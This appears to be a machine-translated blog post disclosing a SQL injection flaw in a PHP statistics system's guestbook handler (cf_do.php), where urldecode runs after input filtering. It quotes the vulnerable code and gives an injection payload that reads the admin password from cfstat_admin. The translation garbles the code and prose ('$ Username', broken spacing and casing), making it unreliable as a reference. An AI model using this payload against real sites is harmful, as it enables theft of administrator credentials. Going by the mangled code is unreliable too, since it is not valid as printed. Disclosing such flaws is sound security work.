Popular multi-user PHP Statistics System v4.0 Injection Vulnerability

Today, when I was tired of reading things, I just downloaded such a set of code.

Let's take a look at his explanation. It is claimed that the password is completely protected against injection attacks, and the password is encrypted with 32-bit Md5.

After reading this, most injections are basically impossible, unless the other party leaks something.

However, there is such a more common vulnerability.

Cf_do.php

Code:
// Leave a message
If ($ action = "gbookaddsave ")
{
$ Username = chkstr ($ _ GET ["username"], 1 );
$ Content = HTMLSpecialChars (chkstr ($ _ POST ["content"], 1 ));
$ Contact = HTMLSpecialChars (chkstr ($ _ POST ["contact"], 1 ));
$ Ly = substr (urldecode (chkstr ($ _ GET ["ly"], 1), 0,255 );
$ Currweb = substr (urldecode (chkstr ($ _ GET ["currweb"], 1), 0,255 );

If ($ content = "") alertclose ("Enter the message content ");
If ($ contact = "") alertclose ("Enter the contact information ");

$ SQL = "select count (*) from cfstat_gbook where username = $ username and content = $ content and contact = $ contact and TO_DAYS (NOW ()-TO_DAYS (addtime) = 0 ";
$ Result = mysql_query ($ SQL );
$ Rs = mysql_fetch_array ($ result );
If ($ rs [0]> 0) alertclose ("You have left the same message before! ");

$ SQL = "insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
($ Username, $ content, $ contact, $ ly, $ currweb, ". date (" Y-m-d H: I: s ").")";
Mysql_query ($ SQL );

Alertclose ("message succeeded ");}

If I have read the second injection vulnerability, I should be familiar with it.
Above, he first passes chkstr filtering before urldecode filtering. This vulnerability is generated.

There is nothing to say about vulnerability mining in general. Usage is relatively good.

Insert into: we can write code like this.

Code:
Insert into cfstat_gbook (username, content, contact, ly, currweb, addtime) values
(1111,1111, 1111, SQL statement, (select pwd from cfstat_admin where id = 1), 1111) % 23 $ currweb ,". date ("Y-m-d H: I: s "). ")

In general, we should not only fix common vulnerabilities, but also many unconventional vulnerabilities.